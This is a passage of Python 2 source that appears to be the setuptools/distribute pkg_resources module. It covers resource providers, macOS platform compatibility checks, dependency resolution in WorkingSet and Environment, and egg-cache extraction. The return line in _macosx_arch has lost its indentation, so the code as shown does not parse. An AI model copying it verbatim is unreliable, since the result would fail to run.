    returns an ``IResourceProvider`` for that module.
    """
    # The registry is consulted by get_provider() via _find_adapter().
    _provider_factories[loader_type] = provider_factory
def get_provider(moduleOrReq):
    """Return an IResourceProvider for the named module or requirement"""
    if isinstance(moduleOrReq, Requirement):
        # Prefer the working set's active distribution; otherwise resolve
        # the requirement from scratch.
        return working_set.find(moduleOrReq) or require(str(moduleOrReq))[0]
    try:
        mod = sys.modules[moduleOrReq]
    except KeyError:
        # Not imported yet: import it, then fetch the module object.
        __import__(moduleOrReq)
        mod = sys.modules[moduleOrReq]
    loader = getattr(mod, '__loader__', None)
    factory = _find_adapter(_provider_factories, loader)
    return factory(mod)
def _macosx_vers(_cache=[]):
    # Return the running macOS version as a list of string components,
    # e.g. ['10', '11', '6'].  The mutable default argument is an
    # *intentional* memoization cache: the version is computed once per
    # process and reused on later calls.
    if not _cache:
        import platform
        version = platform.mac_ver()[0]
        # fallback for MacPorts, whose Python may report an empty version;
        # read the OS version plist directly instead.
        if version == '':
            import plistlib
            plist = '/System/Library/CoreServices/SystemVersion.plist'
            if os.path.exists(plist):
                if hasattr(plistlib, 'readPlist'):
                    plist_content = plistlib.readPlist(plist)
                    if 'ProductVersion' in plist_content:
                        version = plist_content['ProductVersion']
        _cache.append(version.split('.'))
    return _cache[0]
def _macosx_arch(machine):
return {'PowerPC':'ppc', 'Power_Macintosh':'ppc'}.get(machine,machine)
def get_build_platform():
    """Return this platform's string for platform-specific distributions
    XXX Currently this is the same as ``distutils.util.get_platform()``, but it
    needs some hacks for Linux and Mac OS X.
    """
    try:
        from distutils.util import get_platform
    except ImportError:
        # Fall back to sysconfig when distutils is unavailable.
        from sysconfig import get_platform
    plat = get_platform()
    # On Darwin, rewrite platform strings that lack the 'macosx-' prefix
    # using the *running* OS version and the uname machine type.
    if sys.platform == "darwin" and not plat.startswith('macosx-'):
        try:
            version = _macosx_vers()
            machine = os.uname()[4].replace(" ", "_")
            return "macosx-%d.%d-%s" % (int(version[0]), int(version[1]),
                _macosx_arch(machine))
        except ValueError:
            # if someone is running a non-Mac darwin system, this will fall
            # through to the default implementation
            pass
    return plat
# Platform-string patterns, e.g. 'macosx-10.6-intel' and
# 'darwin-8.0.0-Power_Macintosh' (the latter used by pre-setuptools-0.6
# eggs); consumed by compatible_platforms() below.
macosVersionString = re.compile(r"macosx-(\d+)\.(\d+)-(.*)")
darwinVersionString = re.compile(r"darwin-(\d+)\.(\d+)\.(\d+)-(.*)")
get_platform = get_build_platform # XXX backward compat
def compatible_platforms(provided, required):
    """Can code for the `provided` platform run on the `required` platform?
    Returns true if either platform is ``None``, or the platforms are equal.
    XXX Needs compatibility checks for Linux and other unixy OSes.
    """
    # Unspecified platforms are universally compatible; so are exact matches.
    if provided is None or required is None or provided == required:
        return True
    # Mac OS X special cases.  The patterns are duplicated locally from the
    # module-level macosVersionString/darwinVersionString constants so this
    # function is self-contained.
    macos_re = re.compile(r"macosx-(\d+)\.(\d+)-(.*)")
    darwin_re = re.compile(r"darwin-(\d+)\.(\d+)\.(\d+)-(.*)")
    req_mac = macos_re.match(required)
    if not req_mac:
        # XXX Linux and other platforms' special cases should go here
        return False
    prov_mac = macos_re.match(provided)
    if not prov_mac:
        # Backwards compatibility for eggs built before setuptools 0.6,
        # which used the 'darwin' designation instead of 'macosx'.
        prov_darwin = darwin_re.match(provided)
        if prov_darwin:
            dversion = int(prov_darwin.group(1))
            macosversion = "%s.%s" % (req_mac.group(1), req_mac.group(2))
            if (dversion == 7 and macosversion >= "10.3") or \
               (dversion == 8 and macosversion >= "10.4"):
                return True
        return False  # egg isn't macosx or legacy darwin
    # Must match on OS major version and machine type...
    if prov_mac.group(1) != req_mac.group(1) or \
       prov_mac.group(3) != req_mac.group(3):
        return False
    # ...and the required OS minor update must be >= the provided one.
    return int(prov_mac.group(2)) <= int(req_mac.group(2))
def run_script(dist_spec, script_name):
    """Locate distribution `dist_spec` and run its `script_name` script"""
    # Reuse the *caller's* global namespace: clear it, restore only its
    # __name__, then let the distribution's run_script() execute the
    # script in that namespace.
    ns = sys._getframe(1).f_globals
    name = ns['__name__']
    ns.clear()
    ns['__name__'] = name
    require(dist_spec)[0].run_script(script_name, ns)
run_main = run_script # backward compatibility
def get_distribution(dist):
    """Return a current distribution object for a Requirement or string"""
    # Accepts a string spec, a Requirement, or a Distribution; the first
    # two are converted step by step.  (`basestring` ties this vendored
    # module to Python 2.)
    if isinstance(dist,basestring): dist = Requirement.parse(dist)
    if isinstance(dist,Requirement): dist = get_provider(dist)
    if not isinstance(dist,Distribution):
        raise TypeError("Expected string, Requirement, or Distribution", dist)
    return dist
# Thin convenience wrappers: resolve `dist` via get_distribution() and
# delegate to the corresponding Distribution method.
def load_entry_point(dist, group, name):
    """Return `name` entry point of `group` for `dist` or raise ImportError"""
    return get_distribution(dist).load_entry_point(group, name)
def get_entry_map(dist, group=None):
    """Return the entry point map for `group`, or the full entry map"""
    return get_distribution(dist).get_entry_map(group)
def get_entry_info(dist, group, name):
    """Return the EntryPoint object for `group`+`name`, or ``None``"""
    return get_distribution(dist).get_entry_info(group, name)
class IMetadataProvider:
    # Interface specification only: the methods below intentionally omit
    # `self` and have docstring-only bodies.  Concrete providers elsewhere
    # in this module (see the "Provider" entries in __all__) implement them.
    def has_metadata(name):
        """Does the package's distribution contain the named metadata?"""
    def get_metadata(name):
        """The named metadata resource as a string"""
    def get_metadata_lines(name):
        """Yield named metadata resource as list of non-blank non-comment lines
        Leading and trailing whitespace is stripped from each line, and lines
        with ``#`` as the first non-blank character are omitted."""
    def metadata_isdir(name):
        """Is the named metadata a directory? (like ``os.path.isdir()``)"""
    def metadata_listdir(name):
        """List of metadata names in the directory (like ``os.listdir()``)"""
    def run_script(script_name, namespace):
        """Execute the named script in the supplied namespace dictionary"""
class IResourceProvider(IMetadataProvider):
    """An object that provides access to package resources"""
    # Interface specification only (methods intentionally omit `self`);
    # resource names use '/'-separated logical paths, per the module
    # docstring.
    def get_resource_filename(manager, resource_name):
        """Return a true filesystem path for `resource_name`
        `manager` must be an ``IResourceManager``"""
    def get_resource_stream(manager, resource_name):
        """Return a readable file-like object for `resource_name`
        `manager` must be an ``IResourceManager``"""
    def get_resource_string(manager, resource_name):
        """Return a string containing the contents of `resource_name`
        `manager` must be an ``IResourceManager``"""
    def has_resource(resource_name):
        """Does the package contain the named resource?"""
    def resource_isdir(resource_name):
        """Is the named resource a directory? (like ``os.path.isdir()``)"""
    def resource_listdir(resource_name):
        """List of resource names in the directory (like ``os.listdir()``)"""
class WorkingSet(object):
    """A collection of active distributions on sys.path (or a similar list)"""

    def __init__(self, entries=None):
        """Create working set from list of path entries (default=sys.path)"""
        self.entries = []       # path entries, in order (mirrors sys.path)
        self.entry_keys = {}    # path entry -> list of project keys found there
        self.by_key = {}        # project key -> active Distribution
        self.callbacks = []     # subscriber callbacks; see subscribe()
        if entries is None:
            entries = sys.path
        for entry in entries:
            self.add_entry(entry)

    def add_entry(self, entry):
        """Add a path item to ``.entries``, finding any distributions on it

        ``find_distributions(entry,True)`` is used to find distributions
        corresponding to the path entry, and they are added.  `entry` is
        always appended to ``.entries``, even if it is already present.
        (This is because ``sys.path`` can contain the same value more than
        once, and the ``.entries`` of the ``sys.path`` WorkingSet should always
        equal ``sys.path``.)
        """
        self.entry_keys.setdefault(entry, [])
        self.entries.append(entry)
        # only=True: do not descend into distributions nested inside `entry`
        for dist in find_distributions(entry, True):
            self.add(dist, entry, False)

    def __contains__(self,dist):
        """True if `dist` is the active distribution for its project"""
        return self.by_key.get(dist.key) == dist

    def find(self, req):
        """Find a distribution matching requirement `req`

        If there is an active distribution for the requested project, this
        returns it as long as it meets the version requirement specified by
        `req`.  But, if there is an active distribution for the project and it
        does *not* meet the `req` requirement, ``VersionConflict`` is raised.
        If there is no active distribution for the requested project, ``None``
        is returned.
        """
        dist = self.by_key.get(req.key)
        if dist is not None and dist not in req:
            raise VersionConflict(dist,req)  # XXX add more info
        else:
            return dist

    def iter_entry_points(self, group, name=None):
        """Yield entry point objects from `group` matching `name`

        If `name` is None, yields all entry points in `group` from all
        distributions in the working set, otherwise only ones matching
        both `group` and `name` are yielded (in distribution order).
        """
        for dist in self:
            entries = dist.get_entry_map(group)
            if name is None:
                for ep in entries.values():
                    yield ep
            elif name in entries:
                yield entries[name]

    def run_script(self, requires, script_name):
        """Locate distribution for `requires` and run `script_name` script"""
        # Reuse (and wipe) the *caller's* global namespace so the script runs
        # as though it were the calling module, keeping only __name__.
        ns = sys._getframe(1).f_globals
        name = ns['__name__']
        ns.clear()
        ns['__name__'] = name
        self.require(requires)[0].run_script(script_name, ns)

    def __iter__(self):
        """Yield distributions for non-duplicate projects in the working set

        The yield order is the order in which the items' path entries were
        added to the working set.
        """
        seen = {}
        for item in self.entries:
            for key in self.entry_keys[item]:
                if key not in seen:
                    seen[key]=1
                    yield self.by_key[key]

    def add(self, dist, entry=None, insert=True):
        """Add `dist` to working set, associated with `entry`

        If `entry` is unspecified, it defaults to the ``.location`` of `dist`.
        On exit from this routine, `entry` is added to the end of the working
        set's ``.entries`` (if it wasn't already present).

        `dist` is only added to the working set if it's for a project that
        doesn't already have a distribution in the set.  If it's added, any
        callbacks registered with the ``subscribe()`` method will be called.
        """
        if insert:
            dist.insert_on(self.entries, entry)

        if entry is None:
            entry = dist.location
        # A dist is indexed both under the entry it was found on and under
        # its own location (the two may differ for "basket" entries).
        keys = self.entry_keys.setdefault(entry,[])
        keys2 = self.entry_keys.setdefault(dist.location,[])
        if dist.key in self.by_key:
            return      # ignore hidden distros

        self.by_key[dist.key] = dist
        if dist.key not in keys:
            keys.append(dist.key)
        if dist.key not in keys2:
            keys2.append(dist.key)
        self._added_new(dist)

    def resolve(self, requirements, env=None, installer=None, replacement=True):
        """List all distributions needed to (recursively) meet `requirements`

        `requirements` must be a sequence of ``Requirement`` objects.  `env`,
        if supplied, should be an ``Environment`` instance.  If
        not supplied, it defaults to all distributions available within any
        entry or distribution in the working set.  `installer`, if supplied,
        will be invoked with each requirement that cannot be met by an
        already-installed distribution; it should return a ``Distribution`` or
        ``None``.
        """
        requirements = list(requirements)[::-1]  # set up the stack
        processed = {}  # set of processed requirements
        best = {}  # key -> dist
        to_activate = []

        while requirements:
            req = requirements.pop(0)   # process dependencies breadth-first
            # distribute transparently satisfies 'setuptools' requirements
            # with itself unless replacement is disabled
            if _override_setuptools(req) and replacement:
                req = Requirement.parse('distribute')

            if req in processed:
                # Ignore cyclic or redundant dependencies
                continue
            dist = best.get(req.key)
            if dist is None:
                # Find the best distribution and add it to the map
                dist = self.by_key.get(req.key)
                if dist is None:
                    if env is None:
                        env = Environment(self.entries)
                    dist = best[req.key] = env.best_match(req, self, installer)
                    if dist is None:
                        #msg = ("The '%s' distribution was not found on this "
                        #       "system, and is required by this application.")
                        #raise DistributionNotFound(msg % req)

                        # unfortunately, zc.buildout uses a str(err)
                        # to get the name of the distribution here..
                        raise DistributionNotFound(req)
                to_activate.append(dist)
            if dist not in req:
                # Oops, the "best" so far conflicts with a dependency
                raise VersionConflict(dist,req)  # XXX put more info here
            # Push this dist's own requirements (reversed so pop(0) keeps
            # breadth-first ordering).
            requirements.extend(dist.requires(req.extras)[::-1])
            processed[req] = True

        return to_activate  # return list of distros to activate

    def find_plugins(self,
        plugin_env, full_env=None, installer=None, fallback=True
    ):
        """Find all activatable distributions in `plugin_env`

        Example usage::

            distributions, errors = working_set.find_plugins(
                Environment(plugin_dirlist)
            )
            map(working_set.add, distributions)  # add plugins+libs to sys.path
            print 'Could not load', errors        # display errors

        The `plugin_env` should be an ``Environment`` instance that contains
        only distributions that are in the project's "plugin directory" or
        directories. The `full_env`, if supplied, should be an ``Environment``
        contains all currently-available distributions.  If `full_env` is not
        supplied, one is created automatically from the ``WorkingSet`` this
        method is called on, which will typically mean that every directory on
        ``sys.path`` will be scanned for distributions.

        `installer` is a standard installer callback as used by the
        ``resolve()`` method. The `fallback` flag indicates whether we should
        attempt to resolve older versions of a plugin if the newest version
        cannot be resolved.

        This method returns a 2-tuple: (`distributions`, `error_info`), where
        `distributions` is a list of the distributions found in `plugin_env`
        that were loadable, along with any other distributions that are needed
        to resolve their dependencies.  `error_info` is a dictionary mapping
        unloadable plugin distributions to an exception instance describing the
        error that occurred.  Usually this will be a ``DistributionNotFound`` or
        ``VersionConflict`` instance.
        """
        plugin_projects = list(plugin_env)
        plugin_projects.sort()  # scan project names in alphabetic order

        error_info = {}
        distributions = {}

        if full_env is None:
            env = Environment(self.entries)
            env += plugin_env
        else:
            env = full_env + plugin_env

        # Resolve against a shadow copy so failed plugins don't pollute self.
        shadow_set = self.__class__([])
        map(shadow_set.add, self)   # put all our entries in shadow_set

        for project_name in plugin_projects:
            # Environment[project] yields newest-to-oldest candidates
            for dist in plugin_env[project_name]:
                req = [dist.as_requirement()]
                try:
                    resolvees = shadow_set.resolve(req, env, installer)
                except ResolutionError,v:
                    error_info[dist] = v    # save error info
                    if fallback:
                        continue    # try the next older version of project
                    else:
                        break       # give up on this project, keep going
                else:
                    map(shadow_set.add, resolvees)
                    distributions.update(dict.fromkeys(resolvees))
                    # success, no need to try any more versions of this project
                    break

        distributions = list(distributions)
        distributions.sort()

        return distributions, error_info

    def require(self, *requirements):
        """Ensure that distributions matching `requirements` are activated

        `requirements` must be a string or a (possibly-nested) sequence
        thereof, specifying the distributions and versions required.  The
        return value is a sequence of the distributions that needed to be
        activated to fulfill the requirements; all relevant distributions are
        included, even if they were already activated in this working set.
        """
        needed = self.resolve(parse_requirements(requirements))
        for dist in needed:
            self.add(dist)
        return needed

    def subscribe(self, callback):
        """Invoke `callback` for all distributions (including existing ones)"""
        if callback in self.callbacks:
            return
        self.callbacks.append(callback)
        for dist in self:
            callback(dist)

    def _added_new(self, dist):
        # Notify all subscribers that `dist` was activated.
        for callback in self.callbacks:
            callback(dist)
class Environment(object):
    """Searchable snapshot of distributions on a search path"""

    # NOTE: the `platform` default below is evaluated once, at class
    # definition time, not per call -- intentional, since the host platform
    # does not change during a run.
    def __init__(self, search_path=None, platform=get_supported_platform(), python=PY_MAJOR):
        """Snapshot distributions available on a search path

        Any distributions found on `search_path` are added to the environment.
        `search_path` should be a sequence of ``sys.path`` items.  If not
        supplied, ``sys.path`` is used.

        `platform` is an optional string specifying the name of the platform
        that platform-specific distributions must be compatible with.  If
        unspecified, it defaults to the current platform.  `python` is an
        optional string naming the desired version of Python (e.g. ``'2.4'``);
        it defaults to the current version.

        You may explicitly set `platform` (and/or `python`) to ``None`` if you
        wish to map *all* distributions, not just those compatible with the
        running platform or Python version.
        """
        self._distmap = {}  # project key -> list of Distributions
        self._cache = {}    # project name -> sorted list (see __getitem__)
        self.platform = platform
        self.python = python
        self.scan(search_path)

    def can_add(self, dist):
        """Is distribution `dist` acceptable for this environment?

        The distribution must match the platform and python version
        requirements specified when this environment was created, or False
        is returned.
        """
        return (self.python is None or dist.py_version is None
            or dist.py_version==self.python) \
            and compatible_platforms(dist.platform,self.platform)

    def remove(self, dist):
        """Remove `dist` from the environment"""
        self._distmap[dist.key].remove(dist)

    def scan(self, search_path=None):
        """Scan `search_path` for distributions usable in this environment

        Any distributions found are added to the environment.
        `search_path` should be a sequence of ``sys.path`` items.  If not
        supplied, ``sys.path`` is used.  Only distributions conforming to
        the platform/python version defined at initialization are added.
        """
        if search_path is None:
            search_path = sys.path

        for item in search_path:
            for dist in find_distributions(item):
                self.add(dist)

    def __getitem__(self,project_name):
        """Return a newest-to-oldest list of distributions for `project_name`
        """
        try:
            return self._cache[project_name]
        except KeyError:
            # Cache miss: retry with the canonical (lowercased) name.
            project_name = project_name.lower()
            if project_name not in self._distmap:
                return []

        if project_name not in self._cache:
            # Sort in place and cache; later adds keep the cache sorted.
            dists = self._cache[project_name] = self._distmap[project_name]
            _sort_dists(dists)

        return self._cache[project_name]

    def add(self,dist):
        """Add `dist` if we ``can_add()`` it and it isn't already added"""
        if self.can_add(dist) and dist.has_version():
            dists = self._distmap.setdefault(dist.key,[])
            if dist not in dists:
                dists.append(dist)
                if dist.key in self._cache:
                    _sort_dists(self._cache[dist.key])

    def best_match(self, req, working_set, installer=None):
        """Find distribution best matching `req` and usable on `working_set`

        This calls the ``find(req)`` method of the `working_set` to see if a
        suitable distribution is already active.  (This may raise
        ``VersionConflict`` if an unsuitable version of the project is already
        active in the specified `working_set`.)  If a suitable distribution
        isn't active, this method returns the newest distribution in the
        environment that meets the ``Requirement`` in `req`.  If no suitable
        distribution is found, and `installer` is supplied, then the result of
        calling the environment's ``obtain(req, installer)`` method will be
        returned.
        """
        dist = working_set.find(req)
        if dist is not None:
            return dist
        for dist in self[req.key]:
            # self[key] is newest-to-oldest, so first match is the best one
            if dist in req:
                return dist
        return self.obtain(req, installer)  # try and download/install

    def obtain(self, requirement, installer=None):
        """Obtain a distribution matching `requirement` (e.g. via download)

        Obtain a distro that matches requirement (e.g. via download).  In the
        base ``Environment`` class, this routine just returns
        ``installer(requirement)``, unless `installer` is None, in which case
        None is returned instead.  This method is a hook that allows subclasses
        to attempt other ways of obtaining a distribution before falling back
        to the `installer` argument."""
        if installer is not None:
            return installer(requirement)

    def __iter__(self):
        """Yield the unique project names of the available distributions"""
        for key in self._distmap.keys():
            if self[key]: yield key

    def __iadd__(self, other):
        """In-place addition of a distribution or environment"""
        if isinstance(other,Distribution):
            self.add(other)
        elif isinstance(other,Environment):
            for project in other:
                for dist in other[project]:
                    self.add(dist)
        else:
            raise TypeError("Can't add %r to environment" % (other,))
        return self

    def __add__(self, other):
        """Add an environment or distribution to an environment"""
        # The result is unrestricted (platform=python=None) so nothing from
        # either operand is filtered out by can_add().
        new = self.__class__([], platform=None, python=None)
        for env in self, other:
            new += env
        return new
AvailableDistributions = Environment # XXX backward compatibility
class ExtractionError(RuntimeError):
    """An error occurred extracting a resource

    The following attributes are available from instances of this exception:

    manager
        The resource manager that raised this exception

    cache_path
        The base directory for resource extraction

    original_error
        The exception instance that caused extraction to fail
    """
    # The attributes documented above are attached by
    # ResourceManager.extraction_error() just before this is raised.
class ResourceManager:
    """Manage resource extraction and packages"""

    # Base directory for extraction; None means "use get_default_cache()".
    extraction_path = None

    def __init__(self):
        self.cached_files = {}  # extracted target paths, for later cleanup

    def resource_exists(self, package_or_requirement, resource_name):
        """Does the named resource exist?"""
        return get_provider(package_or_requirement).has_resource(resource_name)

    def resource_isdir(self, package_or_requirement, resource_name):
        """Is the named resource an existing directory?"""
        return get_provider(package_or_requirement).resource_isdir(
            resource_name
        )

    def resource_filename(self, package_or_requirement, resource_name):
        """Return a true filesystem path for specified resource"""
        return get_provider(package_or_requirement).get_resource_filename(
            self, resource_name
        )

    def resource_stream(self, package_or_requirement, resource_name):
        """Return a readable file-like object for specified resource"""
        return get_provider(package_or_requirement).get_resource_stream(
            self, resource_name
        )

    def resource_string(self, package_or_requirement, resource_name):
        """Return specified resource as a string"""
        return get_provider(package_or_requirement).get_resource_string(
            self, resource_name
        )

    def resource_listdir(self, package_or_requirement, resource_name):
        """List the contents of the named resource directory"""
        return get_provider(package_or_requirement).resource_listdir(
            resource_name
        )

    def extraction_error(self):
        """Give an error message for problems extracting file(s)"""
        # Wrap whatever exception is currently being handled in an
        # ExtractionError carrying a user-friendly explanation.
        old_exc = sys.exc_info()[1]
        cache_path = self.extraction_path or get_default_cache()

        err = ExtractionError("""Can't extract file(s) to egg cache

The following error occurred while trying to extract file(s) to the Python egg
cache:

  %s

The Python egg cache directory is currently set to:

  %s

Perhaps your account does not have write access to this directory? You can
change the cache directory by setting the PYTHON_EGG_CACHE environment
variable to point to an accessible directory.
""" % (old_exc, cache_path)
        )
        err.manager = self
        err.cache_path = cache_path
        err.original_error = old_exc
        raise err

    def get_cache_path(self, archive_name, names=()):
        """Return absolute location in cache for `archive_name` and `names`

        The parent directory of the resulting path will be created if it does
        not already exist.  `archive_name` should be the base filename of the
        enclosing egg (which may not be the name of the enclosing zipfile!),
        including its ".egg" extension.  `names`, if provided, should be a
        sequence of path name parts "under" the egg's extraction location.

        This method should only be called by resource providers that need to
        obtain an extraction location, and only for names they intend to
        extract, as it tracks the generated names for possible cleanup later.
        """
        extract_path = self.extraction_path or get_default_cache()
        target_path = os.path.join(extract_path, archive_name+'-tmp', *names)
        try:
            _bypass_ensure_directory(target_path)
        except:
            # bare except is deliberate: any failure (OSError, permission,
            # etc.) is re-reported via extraction_error(), which raises.
            self.extraction_error()

        self.cached_files[target_path] = 1
        return target_path

    def postprocess(self, tempname, filename):
        """Perform any platform-specific postprocessing of `tempname`

        This is where Mac header rewrites should be done; other platforms don't
        have anything special they should do.

        Resource providers should call this method ONLY after successfully
        extracting a compressed resource.  They must NOT call it on resources
        that are already in the filesystem.

        `tempname` is the current (temporary) name of the file, and `filename`
        is the name it will be renamed to by the caller after this routine
        returns.
        """
        if os.name == 'posix':
            # Make the resource executable
            # (0555 / 07777 are Python 2 octal literals: r-x for all,
            # masked to the permission + setuid/setgid/sticky bits)
            mode = ((os.stat(tempname).st_mode) | 0555) & 07777
            os.chmod(tempname, mode)

    def set_extraction_path(self, path):
        """Set the base path where resources will be extracted to, if needed.

        If you do not call this routine before any extractions take place, the
        path defaults to the return value of ``get_default_cache()``.  (Which
        is based on the ``PYTHON_EGG_CACHE`` environment variable, with various
        platform-specific fallbacks.  See that routine's documentation for more
        details.)

        Resources are extracted to subdirectories of this path based upon
        information given by the ``IResourceProvider``.  You may set this to a
        temporary directory, but then you must call ``cleanup_resources()`` to
        delete the extracted files when done.  There is no guarantee that
        ``cleanup_resources()`` will be able to remove all extracted files.

        (Note: you may not change the extraction path for a given resource
        manager once resources have been extracted, unless you first call
        ``cleanup_resources()``.)
        """
        if self.cached_files:
            raise ValueError(
                "Can't change extraction path, files already extracted"
            )

        self.extraction_path = path

    def cleanup_resources(self, force=False):
        """
        Delete all extracted resource files and directories, returning a list
        of the file and directory names that could not be successfully removed.
        This function does not have any concurrency protection, so it should
        generally only be called when the extraction path is a temporary
        directory exclusive to a single process.  This method is not
        automatically called; you must call it explicitly or register it as an
        ``atexit`` function if you wish to ensure cleanup of a temporary
        directory used for extractions.
        """
        # XXX -- not implemented in this version
def get_default_cache():
    """Determine the default cache location for egg extraction.

    This returns the ``PYTHON_EGG_CACHE`` environment variable, if set.
    Otherwise, on Windows, it returns a "Python-Eggs" subdirectory of the
    "Application Data" directory.  On all other systems, it's "~/.python-eggs".

    Raises ``RuntimeError`` on Windows if no suitable home directory can be
    derived from the environment.
    """
    try:
        return os.environ['PYTHON_EGG_CACHE']
    except KeyError:
        pass

    if os.name != 'nt':
        return os.path.expanduser('~/.python-eggs')

    app_data = 'Application Data'   # XXX this may be locale-specific!
    # Candidate (env-var combination, subdirectory) pairs, best first.
    app_homes = [
        (('APPDATA',), None),           # best option, should be locale-safe
        (('USERPROFILE',), app_data),
        (('HOMEDRIVE','HOMEPATH'), app_data),
        (('HOMEPATH',), app_data),
        (('HOME',), None),
        (('WINDIR',), app_data),        # 95/98/ME
    ]

    for keys, subdir in app_homes:
        dirname = ''
        for key in keys:
            if key in os.environ:
                dirname = os.path.join(dirname, os.environ[key])
            else:
                break   # a needed env var is missing; try the next candidate
        else:
            if subdir:
                dirname = os.path.join(dirname, subdir)
            return os.path.join(dirname, 'Python-Eggs')
    else:
        # BUGFIX: error message previously misspelled "enviroment"
        raise RuntimeError(
            "Please set the PYTHON_EGG_CACHE environment variable"
        )
def safe_name(name):
    """Convert an arbitrary string to a standard distribution name.

    Any runs of non-alphanumeric/. characters are replaced with a single '-'.
    """
    cleaned = re.sub(r'[^A-Za-z0-9.]+', '-', name)
    return cleaned
def safe_version(version):
    """Convert an arbitrary string to a standard version string.

    Spaces become dots, and all other non-alphanumeric characters become
    dashes, with runs of multiple dashes condensed to a single dash.
    """
    dotted = version.replace(' ', '.')
    return re.sub(r'[^A-Za-z0-9.]+', '-', dotted)
def safe_extra(extra):
    """Convert an arbitrary string to a standard 'extra' name.

    Any runs of non-alphanumeric characters are replaced with a single '_',
    and the result is always lowercased.
    """
    sanitized = re.sub(r'[^A-Za-z0-9.]+', '_', extra)
    return sanitized.lower()
def to_filename(name):
    """Convert a project or version name to its filename-escaped form.

    Any '-' characters are currently replaced with '_'.
    """
    return '_'.join(name.split('-'))
class NullProvider:
    """Try to implement resources and metadata for arbitrary PEP 302 loaders"""

    egg_name = None   # basename of the enclosing .egg, if any
    egg_info = None   # path to the metadata directory, if any
    loader = None     # the module's PEP 302 loader, if any

    def __init__(self, module):
        self.loader = getattr(module, '__loader__', None)
        self.module_path = os.path.dirname(getattr(module, '__file__', ''))

    def get_resource_filename(self, manager, resource_name):
        return self._fn(self.module_path, resource_name)

    def get_resource_stream(self, manager, resource_name):
        return StringIO(self.get_resource_string(manager, resource_name))

    def get_resource_string(self, manager, resource_name):
        return self._get(self._fn(self.module_path, resource_name))

    def has_resource(self, resource_name):
        return self._has(self._fn(self.module_path, resource_name))

    def has_metadata(self, name):
        return self.egg_info and self._has(self._fn(self.egg_info,name))

    # Python 3 loaders return bytes from get_data(); decode there so
    # get_metadata() always returns text on both major versions.
    if sys.version_info <= (3,):
        def get_metadata(self, name):
            if not self.egg_info:
                return ""
            return self._get(self._fn(self.egg_info,name))
    else:
        def get_metadata(self, name):
            if not self.egg_info:
                return ""
            return self._get(self._fn(self.egg_info,name)).decode("utf-8")

    def get_metadata_lines(self, name):
        return yield_lines(self.get_metadata(name))

    def resource_isdir(self,resource_name):
        return self._isdir(self._fn(self.module_path, resource_name))

    def metadata_isdir(self,name):
        return self.egg_info and self._isdir(self._fn(self.egg_info,name))

    def resource_listdir(self,resource_name):
        return self._listdir(self._fn(self.module_path,resource_name))

    def metadata_listdir(self,name):
        if self.egg_info:
            return self._listdir(self._fn(self.egg_info,name))
        return []

    def run_script(self,script_name,namespace):
        """Execute the named script (from the egg's ``scripts/`` metadata
        directory) in the supplied namespace dictionary."""
        script = 'scripts/'+script_name
        if not self.has_metadata(script):
            raise ResolutionError("No script named %r" % script_name)
        # Normalize all line endings to '\n' before compiling.
        script_text = self.get_metadata(script).replace('\r\n','\n')
        script_text = script_text.replace('\r','\n')
        script_filename = self._fn(self.egg_info,script)
        namespace['__file__'] = script_filename
        if os.path.exists(script_filename):
            execfile(script_filename, namespace, namespace)
        else:
            # Script exists only inside an archive: seed linecache so
            # tracebacks can still show source lines, then exec from memory.
            from linecache import cache
            cache[script_filename] = (
                len(script_text), 0, script_text.split('\n'), script_filename
            )
            script_code = compile(script_text,script_filename,'exec')
            exec script_code in namespace, namespace

    # The _has/_isdir/_listdir/_get primitives must be supplied by a
    # subclass registered for the concrete loader type.
    def _has(self, path):
        raise NotImplementedError(
            "Can't perform this operation for unregistered loader type"
        )

    def _isdir(self, path):
        raise NotImplementedError(
            "Can't perform this operation for unregistered loader type"
        )

    def _listdir(self, path):
        raise NotImplementedError(
            "Can't perform this operation for unregistered loader type"
        )

    def _fn(self, base, resource_name):
        # Join a '/'-separated resource name onto `base` using OS separators.
        if resource_name:
            return os.path.join(base, *resource_name.split('/'))
        return base

    def _get(self, path):
        if hasattr(self.loader, 'get_data'):
            return self.loader.get_data(path)
        raise NotImplementedError(
            "Can't perform this operation for loaders without 'get_data()'"
        )
register_loader_type(object, NullProvider)
class EggProvider(NullProvider):
    """Provider based on a virtual filesystem"""

    def __init__(self,module):
        NullProvider.__init__(self,module)
        self._setup_prefix()

    def _setup_prefix(self):
        # we assume here that our metadata may be nested inside a "basket"
        # of multiple eggs; that's why we use module_path instead of .archive
        #
        # Walk up from module_path until a path component ending in '.egg'
        # is found (or the filesystem root is reached, when os.path.split
        # stops changing the path).
        path = self.module_path
        old = None
        while path!=old:
            if path.lower().endswith('.egg'):
                self.egg_name = os.path.basename(path)
                self.egg_info = os.path.join(path, 'EGG-INFO')
                self.egg_root = path
                break
            old = path
            path, base = os.path.split(path)
class DefaultProvider(EggProvider):
    """Provides access to package resources in the filesystem"""

    def _has(self, path):
        """True if `path` exists on the filesystem."""
        return os.path.exists(path)

    def _isdir(self, path):
        """True if `path` is a filesystem directory."""
        return os.path.isdir(path)

    def _listdir(self, path):
        """Directory listing straight from the filesystem."""
        return os.listdir(path)

    def get_resource_stream(self, manager, resource_name):
        """Open the named resource directly as a binary file object."""
        full_path = self._fn(self.module_path, resource_name)
        return open(full_path, 'rb')

    def _get(self, path):
        """Read and return the full binary contents of `path`."""
        handle = open(path, 'rb')
        try:
            data = handle.read()
        finally:
            handle.close()
        return data
register_loader_type(type(None), DefaultProvider)
class EmptyProvider(NullProvider):
    """Provider that returns nothing for all requests"""

    module_path = None

    def __init__(self):
        # No module to inspect; all state lives in the class attributes.
        pass

    def _has(self, path):
        return False

    def _isdir(self, path):
        return False

    def _get(self, path):
        return ''

    def _listdir(self, path):
        return []
empty_provider = EmptyProvider()
class ZipProvider(EggProvider):
    """Resource support for zips and eggs"""

    eagers = None   # cached list of "eager" resource names; see below

    def __init__(self, module):
        EggProvider.__init__(self,module)
        # zipimport keeps a directory cache per archive; reuse it rather
        # than re-reading the zip's central directory.
        self.zipinfo = zipimport._zip_directory_cache[self.loader.archive]
        self.zip_pre = self.loader.archive+os.sep

    def _zipinfo_name(self, fspath):
        # Convert a virtual filename (full path to file) into a zipfile subpath
        # usable with the zipimport directory cache for our target archive
        if fspath.startswith(self.zip_pre):
            return fspath[len(self.zip_pre):]
        raise AssertionError(
            "%s is not a subpath of %s" % (fspath,self.zip_pre)
        )

    def _parts(self,zip_path):
        # Convert a zipfile subpath into an egg-relative path part list
        fspath = self.zip_pre+zip_path  # pseudo-fs path
        if fspath.startswith(self.egg_root+os.sep):
            return fspath[len(self.egg_root)+1:].split(os.sep)
        raise AssertionError(
            "%s is not a subpath of %s" % (fspath,self.egg_root)
        )

